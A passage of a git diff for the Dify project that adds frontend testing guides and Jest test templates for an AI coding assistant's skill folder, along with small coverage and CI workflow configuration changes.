+ ), +})) + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + mockPortalOpenState = false // ✅ Reset shared state + }) +}) +``` + +### 4. API Service Mocks + +```typescript +import * as api from '@/service/api' + +jest.mock('@/service/api') + +const mockedApi = api as jest.Mocked + +describe('Component', () => { + beforeEach(() => { + jest.clearAllMocks() + + // Setup default mock implementation + mockedApi.fetchData.mockResolvedValue({ data: [] }) + }) + + it('should show data on success', async () => { + mockedApi.fetchData.mockResolvedValue({ data: [{ id: 1 }] }) + + render() + + await waitFor(() => { + expect(screen.getByText('1')).toBeInTheDocument() + }) + }) + + it('should show error on failure', async () => { + mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 5. HTTP Mocking with Nock + +```typescript +import nock from 'nock' + +const GITHUB_HOST = 'https://api.github.com' +const GITHUB_PATH = '/repos/owner/repo' + +const mockGithubApi = (status: number, body: Record, delayMs = 0) => { + return nock(GITHUB_HOST) + .get(GITHUB_PATH) + .delay(delayMs) + .reply(status, body) +} + +describe('GithubComponent', () => { + afterEach(() => { + nock.cleanAll() + }) + + it('should display repo info', async () => { + mockGithubApi(200, { name: 'dify', stars: 1000 }) + + render() + + await waitFor(() => { + expect(screen.getByText('dify')).toBeInTheDocument() + }) + }) + + it('should handle API error', async () => { + mockGithubApi(500, { message: 'Server error' }) + + render() + + await waitFor(() => { + expect(screen.getByText(/error/i)).toBeInTheDocument() + }) + }) +}) +``` + +### 6. Context Providers + +```typescript +import { ProviderContext } from '@/context/provider-context' +import { createMockProviderContextValue, createMockPlan } from '@/__mocks__/provider-context' + +describe('Component with Context', () => { + it('should render for free plan', () => { + const mockContext = createMockPlan('sandbox') + + render( + + + + ) + + expect(screen.getByText('Upgrade')).toBeInTheDocument() + }) + + it('should render for pro plan', () => { + const mockContext = createMockPlan('professional') + + render( + + + + ) + + expect(screen.queryByText('Upgrade')).not.toBeInTheDocument() + }) +}) +``` + +### 7. SWR / React Query + +```typescript +// SWR +jest.mock('swr', () => ({ + __esModule: true, + default: jest.fn(), +})) + +import useSWR from 'swr' +const mockedUseSWR = useSWR as jest.Mock + +describe('Component with SWR', () => { + it('should show loading state', () => { + mockedUseSWR.mockReturnValue({ + data: undefined, + error: undefined, + isLoading: true, + }) + + render() + expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) +}) + +// React Query +import { QueryClient, QueryClientProvider } from '@tanstack/react-query' + +const createTestQueryClient = () => new QueryClient({ + defaultOptions: { + queries: { retry: false }, + mutations: { retry: false }, + }, +}) + +const renderWithQueryClient = (ui: React.ReactElement) => { + const queryClient = createTestQueryClient() + return render( + + {ui} + + ) +} +``` + +## Mock Best Practices + +### ✅ DO + +1. **Use real base components** - Import from `@/app/components/base/` directly +1. **Use real project components** - Prefer importing over mocking +1. **Reset mocks in `beforeEach`**, not `afterEach` +1. **Match actual component behavior** in mocks (when mocking is necessary) +1. **Use factory functions** for complex mock data +1. **Import actual types** for type safety +1. **Reset shared mock state** in `beforeEach` + +### ❌ DON'T + +1. **Don't mock base components** (`Loading`, `Button`, `Tooltip`, etc.) +1. Don't mock components you can import directly +1. Don't create overly simplified mocks that miss conditional logic +1. Don't forget to clean up nock after each test +1. Don't use `any` types in mocks without necessity + +### Mock Decision Tree + +``` +Need to use a component in test? +│ +├─ Is it from @/app/components/base/*? +│ └─ YES → Import real component, DO NOT mock +│ +├─ Is it a project component? +│ └─ YES → Prefer importing real component +│ Only mock if setup is extremely complex +│ +├─ Is it an API service (@/service/*)? +│ └─ YES → Mock it +│ +├─ Is it a third-party lib with side effects? +│ └─ YES → Mock it (next/navigation, external SDKs) +│ +└─ Is it i18n? + └─ YES → Uses shared mock (auto-loaded). Override only for custom translations +``` + +## Factory Function Pattern + +```typescript +// __mocks__/data-factories.ts +import type { User, Project } from '@/types' + +export const createMockUser = (overrides: Partial = {}): User => ({ + id: 'user-1', + name: 'Test User', + email: 'test@example.com', + role: 'member', + createdAt: new Date().toISOString(), + ...overrides, +}) + +export const createMockProject = (overrides: Partial = {}): Project => ({ + id: 'project-1', + name: 'Test Project', + description: 'A test project', + owner: createMockUser(), + members: [], + createdAt: new Date().toISOString(), + ...overrides, +}) + +// Usage in tests +it('should display project owner', () => { + const project = createMockProject({ + owner: createMockUser({ name: 'John Doe' }), + }) + + render() + expect(screen.getByText('John Doe')).toBeInTheDocument() +}) +``` diff --git a/.claude/skills/frontend-testing/guides/workflow.md b/.claude/skills/frontend-testing/guides/workflow.md new file mode 100644 index 0000000000..b0f2994bde --- /dev/null +++ b/.claude/skills/frontend-testing/guides/workflow.md @@ -0,0 +1,269 @@ +# Testing Workflow Guide + +This guide defines the workflow for generating tests, especially for complex components or directories with multiple files. + +## Scope Clarification + +This guide addresses **multi-file workflow** (how to process multiple test files). For coverage requirements within a single test file, see `web/testing/testing.md` § Coverage Goals. + +| Scope | Rule | +|-------|------| +| **Single file** | Complete coverage in one generation (100% function, >95% branch) | +| **Multi-file directory** | Process one file at a time, verify each before proceeding | + +## ⚠️ Critical Rule: Incremental Approach for Multi-File Testing + +When testing a **directory with multiple files**, **NEVER generate all test files at once.** Use an incremental, verify-as-you-go approach. + +### Why Incremental? + +| Batch Approach (❌) | Incremental Approach (✅) | +|---------------------|---------------------------| +| Generate 5+ tests at once | Generate 1 test at a time | +| Run tests only at the end | Run test immediately after each file | +| Multiple failures compound | Single point of failure, easy to debug | +| Hard to identify root cause | Clear cause-effect relationship | +| Mock issues affect many files | Mock issues caught early | +| Messy git history | Clean, atomic commits possible | + +## Single File Workflow + +When testing a **single component, hook, or utility**: + +``` +1. Read source code completely +2. Run `pnpm analyze-component ` (if available) +3. Check complexity score and features detected +4. Write the test file +5. Run test: `pnpm test -- .spec.tsx` +6. Fix any failures +7. Verify coverage meets goals (100% function, >95% branch) +``` + +## Directory/Multi-File Workflow (MUST FOLLOW) + +When testing a **directory or multiple files**, follow this strict workflow: + +### Step 1: Analyze and Plan + +1. **List all files** that need tests in the directory +1. **Categorize by complexity**: + - 🟢 **Simple**: Utility functions, simple hooks, presentational components + - 🟡 **Medium**: Components with state, effects, or event handlers + - 🔴 **Complex**: Components with API calls, routing, or many dependencies +1. **Order by dependency**: Test dependencies before dependents +1. **Create a todo list** to track progress + +### Step 2: Determine Processing Order + +Process files in this recommended order: + +``` +1. Utility functions (simplest, no React) +2. Custom hooks (isolated logic) +3. Simple presentational components (few/no props) +4. Medium complexity components (state, effects) +5. Complex components (API, routing, many deps) +6. Container/index components (integration tests - last) +``` + +**Rationale**: + +- Simpler files help establish mock patterns +- Hooks used by components should be tested first +- Integration tests (index files) depend on child components working + +### Step 3: Process Each File Incrementally + +**For EACH file in the ordered list:** + +``` +┌─────────────────────────────────────────────┐ +│ 1. Write test file │ +│ 2. Run: pnpm test -- .spec.tsx │ +│ 3. If FAIL → Fix immediately, re-run │ +│ 4. If PASS → Mark complete in todo list │ +│ 5. ONLY THEN proceed to next file │ +└─────────────────────────────────────────────┘ +``` + +**DO NOT proceed to the next file until the current one passes.** + +### Step 4: Final Verification + +After all individual tests pass: + +```bash +# Run all tests in the directory together +pnpm test -- path/to/directory/ + +# Check coverage +pnpm test -- --coverage path/to/directory/ +``` + +## Component Complexity Guidelines + +Use `pnpm analyze-component ` to assess complexity before testing. + +### 🔴 Very Complex Components (Complexity > 50) + +**Consider refactoring BEFORE testing:** + +- Break component into smaller, testable pieces +- Extract complex logic into custom hooks +- Separate container and presentational layers + +**If testing as-is:** + +- Use integration tests for complex workflows +- Use `test.each()` for data-driven testing +- Multiple `describe` blocks for organization +- Consider testing major sections separately + +### 🟡 Medium Complexity (Complexity 30-50) + +- Group related tests in `describe` blocks +- Test integration scenarios between internal parts +- Focus on state transitions and side effects +- Use helper functions to reduce test complexity + +### 🟢 Simple Components (Complexity < 30) + +- Standard test structure +- Focus on props, rendering, and edge cases +- Usually straightforward to test + +### 📏 Large Files (500+ lines) + +Regardless of complexity score: + +- **Strongly consider refactoring** before testing +- If testing as-is, test major sections separately +- Create helper functions for test setup +- May need multiple test files + +## Todo List Format + +When testing multiple files, use a todo list like this: + +``` +Testing: path/to/directory/ + +Ordered by complexity (simple → complex): + +☐ utils/helper.ts [utility, simple] +☐ hooks/use-custom-hook.ts [hook, simple] +☐ empty-state.tsx [component, simple] +☐ item-card.tsx [component, medium] +☐ list.tsx [component, complex] +☐ index.tsx [integration] + +Progress: 0/6 complete +``` + +Update status as you complete each: + +- ☐ → ⏳ (in progress) +- ⏳ → ✅ (complete and verified) +- ⏳ → ❌ (blocked, needs attention) + +## When to Stop and Verify + +**Always run tests after:** + +- Completing a test file +- Making changes to fix a failure +- Modifying shared mocks +- Updating test utilities or helpers + +**Signs you should pause:** + +- More than 2 consecutive test failures +- Mock-related errors appearing +- Unclear why a test is failing +- Test passing but coverage unexpectedly low + +## Common Pitfalls to Avoid + +### ❌ Don't: Generate Everything First + +``` +# BAD: Writing all files then testing +Write component-a.spec.tsx +Write component-b.spec.tsx +Write component-c.spec.tsx +Write component-d.spec.tsx +Run pnpm test ← Multiple failures, hard to debug +``` + +### ✅ Do: Verify Each Step + +``` +# GOOD: Incremental with verification +Write component-a.spec.tsx +Run pnpm test -- component-a.spec.tsx ✅ +Write component-b.spec.tsx +Run pnpm test -- component-b.spec.tsx ✅ +...continue... +``` + +### ❌ Don't: Skip Verification for "Simple" Components + +Even simple components can have: + +- Import errors +- Missing mock setup +- Incorrect assumptions about props + +**Always verify, regardless of perceived simplicity.** + +### ❌ Don't: Continue When Tests Fail + +Failing tests compound: + +- A mock issue in file A affects files B, C, D +- Fixing A later requires revisiting all dependent tests +- Time wasted on debugging cascading failures + +**Fix failures immediately before proceeding.** + +## Integration with Claude's Todo Feature + +When using Claude for multi-file testing: + +1. **Ask Claude to create a todo list** before starting +1. **Request one file at a time** or ensure Claude processes incrementally +1. **Verify each test passes** before asking for the next +1. **Mark todos complete** as you progress + +Example prompt: + +``` +Test all components in `path/to/directory/`. +First, analyze the directory and create a todo list ordered by complexity. +Then, process ONE file at a time, waiting for my confirmation that tests pass +before proceeding to the next. +``` + +## Summary Checklist + +Before starting multi-file testing: + +- [ ] Listed all files needing tests +- [ ] Ordered by complexity (simple → complex) +- [ ] Created todo list for tracking +- [ ] Understand dependencies between files + +During testing: + +- [ ] Processing ONE file at a time +- [ ] Running tests after EACH file +- [ ] Fixing failures BEFORE proceeding +- [ ] Updating todo list progress + +After completion: + +- [ ] All individual tests pass +- [ ] Full directory test run passes +- [ ] Coverage goals met +- [ ] Todo list shows all complete diff --git a/.claude/skills/frontend-testing/templates/component-test.template.tsx b/.claude/skills/frontend-testing/templates/component-test.template.tsx new file mode 100644 index 0000000000..f1ea71a3fd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/component-test.template.tsx @@ -0,0 +1,296 @@ +/** + * Test Template for React Components + * + * WHY THIS STRUCTURE? + * - Organized sections make tests easy to navigate and maintain + * - Mocks at top ensure consistent test isolation + * - Factory functions reduce duplication and improve readability + * - describe blocks group related scenarios for better debugging + * + * INSTRUCTIONS: + * 1. Replace `ComponentName` with your component name + * 2. Update import path + * 3. Add/remove test sections based on component features (use analyze-component) + * 4. Follow AAA pattern: Arrange → Act → Assert + * + * RUN FIRST: pnpm analyze-component to identify required test scenarios + */ + +import { render, screen, fireEvent, waitFor } from '@testing-library/react' +import userEvent from '@testing-library/user-event' +// import ComponentName from './index' + +// ============================================================================ +// Mocks +// ============================================================================ +// WHY: Mocks must be hoisted to top of file (Jest requirement). +// They run BEFORE imports, so keep them before component imports. + +// i18n (automatically mocked) +// WHY: Shared mock at web/__mocks__/react-i18next.ts is auto-loaded by Jest +// No explicit mock needed - it returns translation keys as-is +// Override only if custom translations are required: +// jest.mock('react-i18next', () => ({ +// useTranslation: () => ({ +// t: (key: string) => { +// const customTranslations: Record = { +// 'my.custom.key': 'Custom Translation', +// } +// return customTranslations[key] || key +// }, +// }), +// })) + +// Router (if component uses useRouter, usePathname, useSearchParams) +// WHY: Isolates tests from Next.js routing, enables testing navigation behavior +// const mockPush = jest.fn() +// jest.mock('next/navigation', () => ({ +// useRouter: () => ({ push: mockPush }), +// usePathname: () => '/test-path', +// })) + +// API services (if component fetches data) +// WHY: Prevents real network calls, enables testing all states (loading/success/error) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// Shared mock state (for portal/dropdown components) +// WHY: Portal components like PortalToFollowElem need shared state between +// parent and child mocks to correctly simulate open/close behavior +// let mockOpenState = false + +// ============================================================================ +// Test Data Factories +// ============================================================================ +// WHY FACTORIES? +// - Avoid hard-coded test data scattered across tests +// - Easy to create variations with overrides +// - Type-safe when using actual types from source +// - Single source of truth for default test values + +// const createMockProps = (overrides = {}) => ({ +// // Default props that make component render successfully +// ...overrides, +// }) + +// const createMockItem = (overrides = {}) => ({ +// id: 'item-1', +// name: 'Test Item', +// ...overrides, +// }) + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// const renderComponent = (props = {}) => { +// return render() +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('ComponentName', () => { + // WHY beforeEach with clearAllMocks? + // - Ensures each test starts with clean slate + // - Prevents mock call history from leaking between tests + // - MUST be beforeEach (not afterEach) to reset BEFORE assertions like toHaveBeenCalledTimes + beforeEach(() => { + jest.clearAllMocks() + // Reset shared mock state if used (CRITICAL for portal/dropdown tests) + // mockOpenState = false + }) + + // -------------------------------------------------------------------------- + // Rendering Tests (REQUIRED - Every component MUST have these) + // -------------------------------------------------------------------------- + // WHY: Catches import errors, missing providers, and basic render issues + describe('Rendering', () => { + it('should render without crashing', () => { + // Arrange - Setup data and mocks + // const props = createMockProps() + + // Act - Render the component + // render() + + // Assert - Verify expected output + // Prefer getByRole for accessibility; it's what users "see" + // expect(screen.getByRole('...')).toBeInTheDocument() + }) + + it('should render with default props', () => { + // WHY: Verifies component works without optional props + // render() + // expect(screen.getByText('...')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Props Tests (REQUIRED - Every component MUST test prop behavior) + // -------------------------------------------------------------------------- + // WHY: Props are the component's API contract. Test them thoroughly. + describe('Props', () => { + it('should apply custom className', () => { + // WHY: Common pattern in Dify - components should merge custom classes + // render() + // expect(screen.getByTestId('component')).toHaveClass('custom-class') + }) + + it('should use default values for optional props', () => { + // WHY: Verifies TypeScript defaults work at runtime + // render() + // expect(screen.getByRole('...')).toHaveAttribute('...', 'default-value') + }) + }) + + // -------------------------------------------------------------------------- + // User Interactions (if component has event handlers - on*, handle*) + // -------------------------------------------------------------------------- + // WHY: Event handlers are core functionality. Test from user's perspective. + describe('User Interactions', () => { + it('should call onClick when clicked', async () => { + // WHY userEvent over fireEvent? + // - userEvent simulates real user behavior (focus, hover, then click) + // - fireEvent is lower-level, doesn't trigger all browser events + // const user = userEvent.setup() + // const handleClick = jest.fn() + // render() + // + // await user.click(screen.getByRole('button')) + // + // expect(handleClick).toHaveBeenCalledTimes(1) + }) + + it('should call onChange when value changes', async () => { + // const user = userEvent.setup() + // const handleChange = jest.fn() + // render() + // + // await user.type(screen.getByRole('textbox'), 'new value') + // + // expect(handleChange).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // State Management (if component uses useState/useReducer) + // -------------------------------------------------------------------------- + // WHY: Test state through observable UI changes, not internal state values + describe('State Management', () => { + it('should update state on interaction', async () => { + // WHY test via UI, not state? + // - State is implementation detail; UI is what users see + // - If UI works correctly, state must be correct + // const user = userEvent.setup() + // render() + // + // // Initial state - verify what user sees + // expect(screen.getByText('Initial')).toBeInTheDocument() + // + // // Trigger state change via user action + // await user.click(screen.getByRole('button')) + // + // // New state - verify UI updated + // expect(screen.getByText('Updated')).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations (if component fetches data - useSWR, useQuery, fetch) + // -------------------------------------------------------------------------- + // WHY: Async operations have 3 states users experience: loading, success, error + describe('Async Operations', () => { + it('should show loading state', () => { + // WHY never-resolving promise? + // - Keeps component in loading state for assertion + // - Alternative: use fake timers + // mockedApi.fetchData.mockImplementation(() => new Promise(() => {})) + // render() + // + // expect(screen.getByText(/loading/i)).toBeInTheDocument() + }) + + it('should show data on success', async () => { + // WHY waitFor? + // - Component updates asynchronously after fetch resolves + // - waitFor retries assertion until it passes or times out + // mockedApi.fetchData.mockResolvedValue({ items: ['Item 1'] }) + // render() + // + // await waitFor(() => { + // expect(screen.getByText('Item 1')).toBeInTheDocument() + // }) + }) + + it('should show error on failure', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // render() + // + // await waitFor(() => { + // expect(screen.getByText(/error/i)).toBeInTheDocument() + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases (REQUIRED - Every component MUST handle edge cases) + // -------------------------------------------------------------------------- + // WHY: Real-world data is messy. Components must handle: + // - Null/undefined from API failures or optional fields + // - Empty arrays/strings from user clearing data + // - Boundary values (0, MAX_INT, special characters) + describe('Edge Cases', () => { + it('should handle null value', () => { + // WHY test null specifically? + // - API might return null for missing data + // - Prevents "Cannot read property of null" in production + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle undefined value', () => { + // WHY test undefined separately from null? + // - TypeScript treats them differently + // - Optional props are undefined, not null + // render() + // expect(screen.getByText(/no data/i)).toBeInTheDocument() + }) + + it('should handle empty array', () => { + // WHY: Empty state often needs special UI (e.g., "No items yet") + // render() + // expect(screen.getByText(/empty/i)).toBeInTheDocument() + }) + + it('should handle empty string', () => { + // WHY: Empty strings are truthy in JS but visually empty + // render() + // expect(screen.getByText(/placeholder/i)).toBeInTheDocument() + }) + }) + + // -------------------------------------------------------------------------- + // Accessibility (optional but recommended for Dify's enterprise users) + // -------------------------------------------------------------------------- + // WHY: Dify has enterprise customers who may require accessibility compliance + describe('Accessibility', () => { + it('should have accessible name', () => { + // WHY getByRole with name? + // - Tests that screen readers can identify the element + // - Enforces proper labeling practices + // render() + // expect(screen.getByRole('button', { name: /test label/i })).toBeInTheDocument() + }) + + it('should support keyboard navigation', async () => { + // WHY: Some users can't use a mouse + // const user = userEvent.setup() + // render() + // + // await user.tab() + // expect(screen.getByRole('button')).toHaveFocus() + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/hook-test.template.ts b/.claude/skills/frontend-testing/templates/hook-test.template.ts new file mode 100644 index 0000000000..4fb7fd21ec --- /dev/null +++ b/.claude/skills/frontend-testing/templates/hook-test.template.ts @@ -0,0 +1,207 @@ +/** + * Test Template for Custom Hooks + * + * Instructions: + * 1. Replace `useHookName` with your hook name + * 2. Update import path + * 3. Add/remove test sections based on hook features + */ + +import { renderHook, act, waitFor } from '@testing-library/react' +// import { useHookName } from './use-hook-name' + +// ============================================================================ +// Mocks +// ============================================================================ + +// API services (if hook fetches data) +// jest.mock('@/service/api') +// import * as api from '@/service/api' +// const mockedApi = api as jest.Mocked + +// ============================================================================ +// Test Helpers +// ============================================================================ + +// Wrapper for hooks that need context +// const createWrapper = (contextValue = {}) => { +// return ({ children }: { children: React.ReactNode }) => ( +// +// {children} +// +// ) +// } + +// ============================================================================ +// Tests +// ============================================================================ + +describe('useHookName', () => { + beforeEach(() => { + jest.clearAllMocks() + }) + + // -------------------------------------------------------------------------- + // Initial State + // -------------------------------------------------------------------------- + describe('Initial State', () => { + it('should return initial state', () => { + // const { result } = renderHook(() => useHookName()) + // + // expect(result.current.value).toBe(initialValue) + // expect(result.current.isLoading).toBe(false) + }) + + it('should accept initial value from props', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'custom' })) + // + // expect(result.current.value).toBe('custom') + }) + }) + + // -------------------------------------------------------------------------- + // State Updates + // -------------------------------------------------------------------------- + describe('State Updates', () => { + it('should update value when setValue is called', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(result.current.value).toBe('new value') + }) + + it('should reset to initial value', () => { + // const { result } = renderHook(() => useHookName({ initialValue: 'initial' })) + // + // act(() => { + // result.current.setValue('changed') + // }) + // expect(result.current.value).toBe('changed') + // + // act(() => { + // result.current.reset() + // }) + // expect(result.current.value).toBe('initial') + }) + }) + + // -------------------------------------------------------------------------- + // Async Operations + // -------------------------------------------------------------------------- + describe('Async Operations', () => { + it('should fetch data on mount', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result } = renderHook(() => useHookName()) + // + // // Initially loading + // expect(result.current.isLoading).toBe(true) + // + // // Wait for data + // await waitFor(() => { + // expect(result.current.isLoading).toBe(false) + // }) + // + // expect(result.current.data).toEqual({ data: 'test' }) + }) + + it('should handle fetch error', async () => { + // mockedApi.fetchData.mockRejectedValue(new Error('Network error')) + // + // const { result } = renderHook(() => useHookName()) + // + // await waitFor(() => { + // expect(result.current.error).toBeTruthy() + // }) + // + // expect(result.current.error?.message).toBe('Network error') + }) + + it('should refetch when dependency changes', async () => { + // mockedApi.fetchData.mockResolvedValue({ data: 'test' }) + // + // const { result, rerender } = renderHook( + // ({ id }) => useHookName(id), + // { initialProps: { id: '1' } } + // ) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('1') + // }) + // + // rerender({ id: '2' }) + // + // await waitFor(() => { + // expect(mockedApi.fetchData).toHaveBeenCalledWith('2') + // }) + }) + }) + + // -------------------------------------------------------------------------- + // Side Effects + // -------------------------------------------------------------------------- + describe('Side Effects', () => { + it('should call callback when value changes', () => { + // const callback = jest.fn() + // const { result } = renderHook(() => useHookName({ onChange: callback })) + // + // act(() => { + // result.current.setValue('new value') + // }) + // + // expect(callback).toHaveBeenCalledWith('new value') + }) + + it('should cleanup on unmount', () => { + // const cleanup = jest.fn() + // jest.spyOn(window, 'addEventListener') + // jest.spyOn(window, 'removeEventListener') + // + // const { unmount } = renderHook(() => useHookName()) + // + // expect(window.addEventListener).toHaveBeenCalled() + // + // unmount() + // + // expect(window.removeEventListener).toHaveBeenCalled() + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle null input', () => { + // const { result } = renderHook(() => useHookName(null)) + // + // expect(result.current.value).toBeNull() + }) + + it('should handle rapid updates', () => { + // const { result } = renderHook(() => useHookName()) + // + // act(() => { + // result.current.setValue('1') + // result.current.setValue('2') + // result.current.setValue('3') + // }) + // + // expect(result.current.value).toBe('3') + }) + }) + + // -------------------------------------------------------------------------- + // With Context (if hook uses context) + // -------------------------------------------------------------------------- + describe('With Context', () => { + it('should use context value', () => { + // const wrapper = createWrapper({ someValue: 'context-value' }) + // const { result } = renderHook(() => useHookName(), { wrapper }) + // + // expect(result.current.contextValue).toBe('context-value') + }) + }) +}) diff --git a/.claude/skills/frontend-testing/templates/utility-test.template.ts b/.claude/skills/frontend-testing/templates/utility-test.template.ts new file mode 100644 index 0000000000..ec13b5f5bd --- /dev/null +++ b/.claude/skills/frontend-testing/templates/utility-test.template.ts @@ -0,0 +1,154 @@ +/** + * Test Template for Utility Functions + * + * Instructions: + * 1. Replace `utilityFunction` with your function name + * 2. Update import path + * 3. Use test.each for data-driven tests + */ + +// import { utilityFunction } from './utility' + +// ============================================================================ +// Tests +// ============================================================================ + +describe('utilityFunction', () => { + // -------------------------------------------------------------------------- + // Basic Functionality + // -------------------------------------------------------------------------- + describe('Basic Functionality', () => { + it('should return expected result for valid input', () => { + // expect(utilityFunction('input')).toBe('expected-output') + }) + + it('should handle multiple arguments', () => { + // expect(utilityFunction('a', 'b', 'c')).toBe('abc') + }) + }) + + // -------------------------------------------------------------------------- + // Data-Driven Tests + // -------------------------------------------------------------------------- + describe('Input/Output Mapping', () => { + test.each([ + // [input, expected] + ['input1', 'output1'], + ['input2', 'output2'], + ['input3', 'output3'], + ])('should return %s for input %s', (input, expected) => { + // expect(utilityFunction(input)).toBe(expected) + }) + }) + + // -------------------------------------------------------------------------- + // Edge Cases + // -------------------------------------------------------------------------- + describe('Edge Cases', () => { + it('should handle empty string', () => { + // expect(utilityFunction('')).toBe('') + }) + + it('should handle null', () => { + // expect(utilityFunction(null)).toBe(null) + // or + // expect(() => utilityFunction(null)).toThrow() + }) + + it('should handle undefined', () => { + // expect(utilityFunction(undefined)).toBe(undefined) + // or + // expect(() => utilityFunction(undefined)).toThrow() + }) + + it('should handle empty array', () => { + // expect(utilityFunction([])).toEqual([]) + }) + + it('should handle empty object', () => { + // expect(utilityFunction({})).toEqual({}) + }) + }) + + // -------------------------------------------------------------------------- + // Boundary Conditions + // -------------------------------------------------------------------------- + describe('Boundary Conditions', () => { + it('should handle minimum value', () => { + // expect(utilityFunction(0)).toBe(0) + }) + + it('should handle maximum value', () => { + // expect(utilityFunction(Number.MAX_SAFE_INTEGER)).toBe(...) + }) + + it('should handle negative numbers', () => { + // expect(utilityFunction(-1)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Type Coercion (if applicable) + // -------------------------------------------------------------------------- + describe('Type Handling', () => { + it('should handle numeric string', () => { + // expect(utilityFunction('123')).toBe(123) + }) + + it('should handle boolean', () => { + // expect(utilityFunction(true)).toBe(...) + }) + }) + + // -------------------------------------------------------------------------- + // Error Cases + // -------------------------------------------------------------------------- + describe('Error Handling', () => { + it('should throw for invalid input', () => { + // expect(() => utilityFunction('invalid')).toThrow('Error message') + }) + + it('should throw with specific error type', () => { + // expect(() => utilityFunction('invalid')).toThrow(ValidationError) + }) + }) + + // -------------------------------------------------------------------------- + // Complex Objects (if applicable) + // -------------------------------------------------------------------------- + describe('Object Handling', () => { + it('should preserve object structure', () => { + // const input = { a: 1, b: 2 } + // expect(utilityFunction(input)).toEqual({ a: 1, b: 2 }) + }) + + it('should handle nested objects', () => { + // const input = { nested: { deep: 'value' } } + // expect(utilityFunction(input)).toEqual({ nested: { deep: 'transformed' } }) + }) + + it('should not mutate input', () => { + // const input = { a: 1 } + // const inputCopy = { ...input } + // utilityFunction(input) + // expect(input).toEqual(inputCopy) + }) + }) + + // -------------------------------------------------------------------------- + // Array Handling (if applicable) + // -------------------------------------------------------------------------- + describe('Array Handling', () => { + it('should process all elements', () => { + // expect(utilityFunction([1, 2, 3])).toEqual([2, 4, 6]) + }) + + it('should handle single element array', () => { + // expect(utilityFunction([1])).toEqual([2]) + }) + + it('should preserve order', () => { + // expect(utilityFunction(['c', 'a', 'b'])).toEqual(['c', 'a', 'b']) + }) + }) +}) diff --git a/.coveragerc b/.coveragerc new file mode 100644 index 0000000000..190c0c185b --- /dev/null +++ b/.coveragerc @@ -0,0 +1,5 @@ +[run] +omit = + api/tests/* + api/migrations/* + api/core/rag/datasource/vdb/* diff --git a/.github/copilot-instructions.md b/.github/copilot-instructions.md deleted file mode 100644 index 53afcbda1e..0000000000 --- a/.github/copilot-instructions.md +++ /dev/null @@ -1,12 +0,0 @@ -# Copilot Instructions - -GitHub Copilot must follow the unified frontend testing requirements documented in `web/testing/testing.md`. - -Key reminders: - -- Generate tests using the mandated tech stack, naming, and code style (AAA pattern, `fireEvent`, descriptive test names, cleans up mocks). -- Cover rendering, prop combinations, and edge cases by default; extend coverage for hooks, routing, async flows, and domain-specific components when applicable. -- Target >95% line and branch coverage and 100% function/statement coverage. -- Apply the project's mocking conventions for i18n, toast notifications, and Next.js utilities. - -Any suggestions from Copilot that conflict with `web/testing/testing.md` should be revised before acceptance. diff --git a/.github/workflows/api-tests.yml b/.github/workflows/api-tests.yml index 557d747a8c..76cbf64fca 100644 --- a/.github/workflows/api-tests.yml +++ b/.github/workflows/api-tests.yml @@ -71,18 +71,18 @@ jobs: run: | cp api/tests/integration_tests/.env.example api/tests/integration_tests/.env - - name: Run Workflow - run: uv run --project api bash dev/pytest/pytest_workflow.sh - - - name: Run Tool - run: uv run --project api bash dev/pytest/pytest_tools.sh - - - name: Run TestContainers - run: uv run --project api bash dev/pytest/pytest_testcontainers.sh - - - name: Run Unit tests + - name: Run API Tests + env: + STORAGE_TYPE: opendal + OPENDAL_SCHEME: fs + OPENDAL_FS_ROOT: /tmp/dify-storage run: | - uv run --project api bash dev/pytest/pytest_unit_tests.sh + uv run --project api pytest \ + --timeout "${PYTEST_TIMEOUT:-180}" \ + api/tests/integration_tests/workflow \ + api/tests/integration_tests/tools \ + api/tests/test_containers_integration_tests \ + api/tests/unit_tests - name: Coverage Summary run: | @@ -93,5 +93,12 @@ jobs: # Create a detailed coverage summary echo "### Test Coverage Summary :test_tube:" >> $GITHUB_STEP_SUMMARY echo "Total Coverage: ${TOTAL_COVERAGE}%" >> $GITHUB_STEP_SUMMARY - uv run --project api coverage report --format=markdown >> $GITHUB_STEP_SUMMARY - + { + echo "" + echo "
File-level coverage (click to expand)" + echo "" + echo '```' + uv run --project api coverage report -m + echo '```' + echo "
